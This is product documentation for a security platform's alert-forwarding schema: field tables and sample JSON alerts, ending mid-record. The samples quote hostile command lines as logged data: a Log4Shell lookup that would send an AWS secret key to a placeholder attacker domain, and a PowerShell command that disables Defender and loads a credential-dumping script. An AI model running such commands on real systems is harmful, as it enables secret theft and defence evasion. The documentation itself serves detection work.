Alert Schema 2.0.0
Introduction
The following tables list the fields that can be included in an alert record for each alert type generated by the Carbon Black Cloud.
This Data Forwarder Schema (v2.0.0/) is aligned with the Alerts v7 API schema.
Fields in the Base Alert section are included with most alert types and the exceptions are annotated.
Alert types that are emitted from the Data Forwarder are dependent on the features you have enabled in Carbon Black Cloud. Possible Alert types are:
- CB_ANALYTICS - created from the Endpoint Standard NGAV offering.
- CONTAINER_RUNTIME - created from the Container Security offering.
- DEVICE_CONTROL - created when an endpoint attempts to access a blocked USB device.
- HOST_BASED_FIREWALL - created from network detections in the Endpoint Standard Host-Based Firewall add-on.
- INTRUSION_DETECTION_SYSTEM - created by the XDR extension to Enterprise EDR.
- WATCHLIST - created from alert enabled watchlists in Enterprise EDR.
Data Types
Find more detail on the data types here.
Base Alert
These fields are included with all alert types.
Note: Certain fields that were previously included in this listing, but were never actually populated, have been removed.Field Name | Definition | Datatype |
---|---|---|
alert_notes_present |
True if notes are present on the alert ID. False if notes are not present. | Boolean
|
alert_url |
Link to the alerts page for this alert. Does not vary by alert type | String
|
backend_timestamp |
Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. | ISO 8601 UTC Date String |
backend_update_timestamp . |
Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page.
Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp |
ISO 8601 UTC Date String |
blocked_effective_reputation |
Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred
Not available on Container Runtime Alerts Not available on Device Control Alerts Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String |
blocked_md5 |
MD5 hash of the child process binary; for any process terminated by the sensor
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
blocked_name |
Tokenized file path of the files blocked by sensor action
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
blocked_sha256 |
SHA-256 hash of the child process binary; for any process terminated by the sensor
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
childproc_cmdline |
Command line for the child process
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
childproc_effective_reputation |
Effective reputation of the child process; applied by the sensor at the time the event occurred
Not available on Container Runtime Alerts Not available on Device Control Alerts Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String |
childproc_guid |
Unique process identifier assigned to the child process
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
childproc_md5 |
Hash of the child process' binary (Enterprise EDR)
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
childproc_name |
Filesystem path of the child process' binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
childproc_sha256 |
Hash of the child process' binary (Endpoint Standard)
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
childproc_username |
User context in which the child process was executed
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
detection_timestamp |
Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. | ISO 8601 UTC Date String |
determination |
User-updatable determination of the alert, as a JSON object:
|
Object |
device_external_ip |
IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)
Not available on Container Runtime Alerts |
String
|
device_id |
ID of devices
Not available on Container Runtime Alerts |
Integer
|
device_internal_ip |
IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)
Not available on Container Runtime Alerts |
String
|
device_location |
Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix
Not available on Container Runtime Alerts Possible values: ONSITE
OFFSITE
UNKNOWN |
String |
device_name |
Device name
Not available on Container Runtime Alerts |
String
|
device_os |
Device Operating Systems
Not available on Container Runtime Alerts Possible values: WINDOWS
MAC
LINUX
OTHER |
String |
device_os_version |
The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later.
Not available on Container Runtime Alerts |
String
|
device_policy |
Device policy
Not available on Container Runtime Alerts |
String
|
device_policy_id |
Device policy id
Not available on Container Runtime Alerts |
Integer
|
device_target_value |
Target value assigned to the device, set from the policy
Not available on Container Runtime Alerts |
String
LOW
MEDIUM
HIGH
MISSION_CRITICAL |
device_uem_id |
Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function
Not available on Container Runtime Alerts |
String
|
device_username |
Users or device owners of alerts
Not available on Container Runtime Alerts |
String
|
first_event_timestamp |
Timestamp when the first event in the alert occurred | ISO 8601 UTC Date String |
id |
Unique ID of alert | String
|
is_updated |
Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. |
Boolean
|
last_event_timestamp |
Timestamp when the last event in the alert occurred | ISO 8601 UTC Date String |
netconn_local_ip |
IP address of the remote side of the network connection; stored as dotted decimal Not available on Device Control Alerts
|
String
|
netconn_local_ipv4 |
IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
|
String
|
netconn_local_ipv6 |
IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
|
String
|
netconn_local_port |
TCP or UDP port used by the local side of the network connection Not available on Device Control Alerts
|
Integer
|
netconn_protocol |
Network protocol of the network connection Not available on Device Control Alerts
|
String
|
netconn_remote_domain |
Domain name (FQDN) associated with the remote end of the network connection, if available Not available on Device Control Alerts
|
String
|
netconn_remote_ip |
IP address of the local side of the network connection; stored as dotted decimal Not available on Device Control Alerts
|
String
|
netconn_remote_ipv4 |
IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
|
String
|
netconn_remote_ipv6 |
IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
|
String
|
netconn_remote_port |
TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port Not available on Device Control Alerts
|
Integer
|
org_key |
Unique alphanumeric string that identifies your organization in the Carbon Black Cloud | String
|
parent_cmdline |
Command line of the parent process
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
parent_effective_reputation |
Effective reputation of the parent process; applied by the sensor when the event occurred
Not available on Container Runtime Alerts Not available on Device Control Alerts Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String |
parent_guid |
Unique process identifier assigned to the parent process
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
parent_md5 |
MD5 hash of the parent process binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
parent_name |
Filesystem path of the parent process binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
parent_pid |
Identifier assigned by the operating system to the parent process | Integer
|
parent_reputation |
Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed
Not available on Container Runtime Alerts Not available on Device Control Alerts Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String |
parent_sha256 |
SHA-256 hash of the parent process binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
parent_username |
User context in which the parent process was executed
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
policy_applied |
Indicates whether or not a policy has been applied to any event associated with this alert
Possible values: APPLIED
NOT_APPLIED |
String |
primary_event_id |
ID of the primary event in the alert | String
|
process_cmdline |
Command line executed by the actor process
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
process_effective_reputation |
Effective reputation of the actor hash
Not available on Container Runtime Alerts Not available on Device Control Alerts Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String |
process_guid |
Guid of the process that has fired the alert (optional)
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
process_issuer |
The certificate authority associated with the process’s certificate
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String[] |
process_md5 |
MD5 hash of the actor process binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
process_name |
Process names of an alert
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
process_pid |
PID of the process that has fired the alert (optional) | Integer
|
process_publisher |
Publisher name on the certificate used to sign the Windows or macOS process binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String[] |
process_reputation |
Reputation of the actor process; applied when event is processed by the Carbon Black Cloud
Not available on Container Runtime Alerts Not available on Device Control Alerts Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String |
process_sha256 |
SHA-256 hash of the actor process binary
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
process_username |
User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid().
Not available on Container Runtime Alerts Not available on Device Control Alerts |
String
|
reason |
A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences. | String
|
reason_code |
A unique short-hand code or GUID identifying the particular alert reason | String
|
run_state |
Whether the threat in the alert actually ran
Possible values: DID_NOT_RUN
RAN
UNKNOWN |
String |
sensor_action |
Actions taken by the sensor, according to the rules of a policy
Possible values: ALLOW
DENY
TERMINATE |
String |
severity |
integer representation of the impact of alert if true positive | Integer
|
threat_id |
ID assigned to a group of alerts with common criteria, based on alert type | String
|
type |
Type of alert generated
Possible values: CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS |
String |
user_update_timestamp |
Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination | ISO 8601 UTC Date String |
version |
The version of the schema being emitted. e.g. 2.0.0 |
String
|
watchlists |
A list of watchlists that are triggered by this alert, as JSON objects, each of which contains id and name elements that identify a watchlist. |
Object[] |
workflow |
Current workflow state of an alert, as a JSON object. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route.
|
Object |
Example
{
"version":"2.0.0",
"org_key":"ABCD1234",
"alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c",
"id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
"type":"INTRUSION_DETECTION_SYSTEM",
"is_updated":false,
"detection_timestamp":"2023-02-03T17:22:03.945Z",
"first_event_timestamp":"2023-02-03T17:22:03.945Z",
"last_event_timestamp":"2023-02-03T17:22:03.945Z",
"severity":1,
"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 142.250.189.174 from 10.203.105.21",
"threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
"primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-02-03T17:27:33.007Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
"rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_policy_id":165700,
"device_policy":"Standard",
"device_id":17482451,
"device_name":"DEV01-39X-1",
"device_os":"WINDOWS",
"device_os_version":"Windows 10 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"66.170.99.2",
"device_internal_ip":"10.203.105.21",
"netconn_remote_port":80,
"netconn_local_port":49233,
"netconn_remote_domain":"google.com",
"netconn_remote_ip":"142.250.189.174",
"netconn_local_ip":"10.203.105.21",
"netconn_remote_ipv4":"142.250.189.174",
"netconn_local_ipv4":"10.203.105.21",
"attack_tactic":"TA0001",
"attack_technique":"T1190",
"tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
"threat_name":"CVE-2021-44228 Exploit",
"process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
"process_pid":5780,
"process_name":"c:\\windows\\system32\\curl.exe",
"process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
"process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
"process_username":"DEV01-39X-1\\bit9qa",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
"parent_pid":8796,
"parent_name":"c:\\windows\\system32\\cmd.exe",
"parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
"parent_username":"DEV01-39X-1\\bit9qa",
"mdr_alert_notes_present":false,
"mdr_alert":false
}
CB Analytics Alerts
CB Analytics alerts are created from the Endpoint Standard NGAV offering. They contain the fields in this section in addition to those listed in Base Alert.
Field Name | Definition | Datatype |
---|---|---|
attack_tactic |
A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access | String
|
attack_technique |
A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access | String |
rule_category_id |
ID representing the category of the rule_id for certain alert types | String
|
rule_id |
ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts | String
|
ttps |
Other potential malicious activities involved in a threat | String[] |
Example
{
"version":"2.0.0",
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"type":"CB_ANALYTICS",
"is_updated":true,
"detection_timestamp":"2023-07-17T17:15:51.708Z",
"backend_timestamp":"2023-07-17T17:16:50.960Z",
"backend_update_timestamp":"2023-07-17T17:18:03.397Z",
"first_event_timestamp":"2023-07-17T17:15:33.396Z",
"last_event_timestamp":"2023-07-17T17:15:33.396Z",
"severity":5,
"reason":"A known virus (HackTool: Powerpuff) was detected running.",
"threat_id":"9e0afc389c1acc43b382b1ba590498d2",
"primary_event_id":"94953e4524c511ee86284f0541a5184d",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-07-17T17:16:50.960Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"determination":{
"value":"NONE",
"change_timestamp":"2023-07-17T17:16:50.960Z"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"T_REP_VIRUS",
"sensor_action":"ALLOW",
"device_target_value":"MISSION_CRITICAL",
"device_policy_id":112221,
"device_policy":"SSQ_Policy",
"device_id":6948863,
"device_name":"Kognos-W19-CB-3",
"device_os":"WINDOWS",
"device_os_version":"Windows Server 2019 x64",
"device_username":"demouser@demo.org",
"device_location":"OFFSITE",
"device_external_ip":"34.234.170.45",
"device_internal_ip":"10.0.14.120",
"ttps":[
"FILELESS",
"MALWARE_APP",
"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
"MITRE_T1059_001_POWERSHELL",
"RUN_MALWARE_APP"
],
"attack_tactic":"TA0002",
"process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
"process_pid":3600,
"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
"process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
"process_md5":"42a80cc2333b612b63a859f17474c9af",
"process_reputation":"KNOWN_MALWARE",
"process_effective_reputation":"KNOWN_MALWARE",
"process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
"process_username":"KOGNOS-W19-CB-3\\Administrator",
"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
"parent_pid":4024,
"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
"childproc_effective_reputation":"RESOLVING",
"childproc_username":"KOGNOS-W19-CB-3\\Administrator",
"blocked_effective_reputation":"RESOLVING",
"mdr_alert_notes_present":false,
"mdr_alert":false
}
Container Runtime Alerts
Container Runtime alerts are created from the Container Security offering. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
connection_type |
Connection Type
Possible values: INTERNAL_INBOUND
INTERNAL_OUTBOUND
INGRESS
EGRESS |
String |
egress_group_id |
Unique identifier for the egress group | String
|
egress_group_name |
Name of the egress group | String
|
ip_reputation |
Range of reputations to accept for the remote IP:
0: unknown 1-20: high risk 21-40: suspicious 41-60: moderate 61-80: low risk 81-100: trustworthy There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive) |
Integer
|
k8s_cluster |
K8s Cluster name | String
|
k8s_kind |
K8s Workload kind | String
|
k8s_namespace |
K8s namespace | String
|
k8s_pod_name |
Name of the pod within a workload | String
|
k8s_policy |
Name of the K8s policy | String
|
k8s_policy_id |
Unique identifier for the K8s policy | String
|
k8s_rule |
Name of the K8s policy rule | String
|
k8s_rule_id |
Unique identifier for the K8s policy rule | String
|
k8s_workload_name |
K8s Workload Name | String
|
remote_is_private |
Is the remote information private: true or false | Boolean
|
remote_k8s_kind |
Kind of remote workload; set if the remote side is another workload in the same cluster | String
|
remote_k8s_namespace |
Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster | String
|
remote_k8s_pod_name |
Remote workload pod name; set if the remote side is another workload in the same cluster | String
|
remote_k8s_workload_name |
Name of the remote workload; set if the remote side is another workload in the same cluster | String
|
Example
{
"version":"2.0.0",
"org_key":"ABCD1234",
"alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"type":"CONTAINER_RUNTIME",
"is_updated":false,
"detection_timestamp":"2023-02-06T00:10:51.176Z",
"first_event_timestamp":"2023-02-06T00:09:19.320Z",
"last_event_timestamp":"2023-02-06T00:09:19.320Z",
"severity":5,
"reason":"Detected a connection to a public destination that isn't allowed for this scope",
"threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
"primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-02-06T00:13:37.663Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_os":"WINDOWS",
"device_location":"UNKNOWN",
"k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7",
"k8s_policy":"Big runtime policy",
"k8s_rule_id":"11111111-1111-1111-1111-111111111111",
"k8s_rule":"Allowed public destinations",
"k8s_cluster":"tomer:sensor-aks",
"k8s_namespace":"kube-system",
"k8s_kind":"DaemonSet",
"k8s_workload_name":"ama-logs",
"k8s_pod_name":"ama-logs-gm5tt",
"connection_type":"EGRESS",
"ip_reputation":96,
"netconn_remote_port":443,
"netconn_local_port":56618,
"netconn_protocol":"TCP",
"netconn_remote_domain":"westeurope.monitoring.azure.com",
"netconn_remote_ip":"20.50.65.82",
"netconn_local_ip":"10.244.2.22",
"netconn_remote_ipv4":"20.50.65.82",
"netconn_local_ipv4":"10.244.2.22",
"remote_is_private":false,
"process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33",
"process_pid":2100834,
"process_name":"KUBERNETES_RUNTIME_NODE_AGENT",
"process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5",
"process_md5":"4cbdc5f51d0397b26886191b799131d5",
"process_reputation":"NOT_LISTED",
"process_effective_reputation":"RESOLVING",
"mdr_alert_notes_present":false,
"mdr_alert":false
}
Device Control Alerts
Device Control alerts are created when an endpoint attempts to access a blocked USB device. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
external_device_friendly_name |
Human-readable external device names | String
|
product_id |
IDs of the product that identifies USB devices | String
|
product_name |
Names of the product that identifies USB devices | String
|
serial_number |
Serial numbers of the specific devices | String
|
vendor_id |
IDs of the vendors who produced the devices | String
|
vendor_name |
Names of the vendors who produced the devices | String
|
Host Based Firewall Alerts
Host-Based Firewall alerts are created from network detections in the Endpoint Standard Host-Based Firewall add-on. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
rule_category_id |
ID representing the category of the rule_id for certain alert types | String
|
rule_id |
ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts | String
|
Intrusion Detection Alerts
Intrusion Detection System alerts are created by the XDR extension to Enterprise EDR. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
attack_tactic |
A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access | String
|
attack_technique |
A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access | String |
rule_category_id |
ID representing the category of the rule_id for certain alert types | String
|
threat_name |
Name of the threat | String
|
tms_rule_id |
Detection id | String
|
ttps |
Other potential malicious activities involved in a threat | String[] |
Watchlist Alerts
Watchlist alerts are created from alert enabled watchlists in Enterprise EDR. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
attack_tactic |
A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access | String
|
attack_technique |
A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access | String |
ioc_field |
The field the indicator of comprise (IOC) hit contains | String
|
ioc_hit |
IOC field value or IOC query that matches | String
|
ioc_id |
Unique identifier of the IOC that generated the watchlist hit | String
|
ml_classification_final_verdict |
Final verdict of the alert, based on the ML models that were used to make the prediction.
Possible values: NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS |
String |
ml_classification_global_prevalence |
Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations.
Possible values: UNKNOWN
LOW
MEDIUM
HIGH |
String |
ml_classification_org_prevalence |
Categories (low/medium/high) used to describe the prevalence of alerts within an organization.
Possible values: UNKNOWN
LOW
MEDIUM
HIGH |
String |
report_description |
Description of the watchlist report associated with the alert | String
|
report_id |
Report IDs that contained the IOC that caused a hit | String
|
report_link |
Link of reports that contained the IOC that caused a hit | String
|
report_name |
Name of the watchlist report | String
|
report_tags |
Tags associated with the watchlist report | String[]
|
ttps |
Other potential malicious activities involved in a threat | String[] |
watchlists |
List of watchlists associated with an alert. Alerts are batched hourly.
|
Object[] |
Example
{
"version":"2.0.0",
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"type":"WATCHLIST",
"is_updated":false,
"detection_timestamp":"2023-07-17T17:21:13.483Z",
"backend_timestamp":"2023-07-17T17:21:34.063Z",
"backend_update_timestamp":"2023-07-17T17:21:34.063Z",
"first_event_timestamp":"2023-07-17T17:19:00.412Z",
"last_event_timestamp":"2023-07-17T17:19:00.412Z",
"severity":10,
"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
"threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
"primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-07-17T17:21:34.063Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"determination":{
"value":"NONE",
"change_timestamp":"2023-07-17T17:21:34.063Z"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_policy_id":6525,
"device_policy":"default",
"device_id":5890528,
"device_name":"ABT102675",
"device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
"device_os":"WINDOWS",
"device_os_version":"Windows 11 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"49.206.61.4",
"device_internal_ip":"192.168.0.104",
"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
"report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
"report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
"report_tags":[
"credentialaccess",
"t1558",
"windows",
"amsi",
"attack",
"attackframework"
],
